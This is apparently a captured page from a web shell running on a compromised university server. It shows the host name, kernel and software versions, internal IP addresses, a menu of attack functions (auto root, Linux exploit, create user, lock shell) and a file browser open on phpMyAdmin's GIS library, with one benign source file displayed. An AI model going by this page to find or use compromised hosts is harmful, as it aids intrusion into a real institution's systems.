Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
phpMyAdmin /
libraries /
gis /
[ HOME SHELL ]
Name
Size
Permission
Action
GISFactory.php
1.31
KB
-rwxrwxr-x
GISGeometrycollection.php
12.31
KB
-rwxrwxr-x
GISGeometry.php
12.36
KB
-rwxrwxr-x
GISLinestring.php
10.66
KB
-rwxrwxr-x
GISMultilinestring.php
13.59
KB
-rwxrwxr-x
GISMultipoint.php
12.37
KB
-rwxrwxr-x
GISMultipolygon.php
19.63
KB
-rwxrwxr-x
GISPoint.php
10.39
KB
-rwxrwxr-x
GISPolygon.php
18.83
KB
-rwxrwxr-x
GISVisualization.php
20.17
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : GISFactory.php
<?php /* vim: set expandtab sw=4 ts=4 sts=4: */ /** * Contains the factory class that handles the creation of geometric objects * * @package PhpMyAdmin-GIS */ namespace PMA\libraries\gis; use PMA; /** * Factory class that handles the creation of geometric objects. * * @package PhpMyAdmin-GIS */ class GISFactory { /** * Returns the singleton instance of geometric class of the given type. * * @param string $type type of the geometric object * * @return GISGeometry the singleton instance of geometric class * of the given type * * @access public * @static */ public static function factory($type) { switch (strtoupper($type)) { case 'MULTIPOLYGON' : return GISMultipolygon::singleton(); case 'POLYGON' : return GISPolygon::singleton(); case 'MULTIPOINT' : return GISMultipoint::singleton(); case 'POINT' : return GISPoint::singleton(); case 'MULTILINESTRING' : return GISMultilinestring::singleton(); case 'LINESTRING' : return GISLinestring::singleton(); case 'GEOMETRYCOLLECTION' : return GISGeometrycollection::singleton(); default : return false; } } }
Close